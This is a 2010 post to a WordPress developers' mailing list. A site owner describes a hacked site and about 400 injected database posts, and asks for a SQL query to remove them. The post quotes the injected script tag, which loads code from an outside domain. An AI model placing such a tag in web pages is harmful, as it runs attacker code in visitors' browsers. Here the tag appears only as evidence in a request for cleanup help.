[wp-hackers] 3.0 site got hacked

24/7 24-7 at gmx.net
Thu Jul 22 02:05:02 UTC 2010

> Your host seems to be having some problems:
> http://weblog.mediatemple.net/weblog/category/system-incidents/1378-i...

Thanks Andrew. Hot Tip. I had already checked the users and still only
have one user. But when looking into the db, there where about 400 new
posts (other content titles were doubled) all containing:

<script src="http://ae.awaue.com/7"></script>

(If you take a look at the domain, then you can read the plain
script). I wonder why they don't show up in the admin-UI.

I still don't know how this got into my system. I'm now searching for
a SQL-query to delete all the scripts. Pretty tired now, but maybe
it's possible with a normal query und some update post content
function. If someone has any idea or done this before: I'd love to
hear from you. Thanks a lot!

More information about the wp-hackers mailing list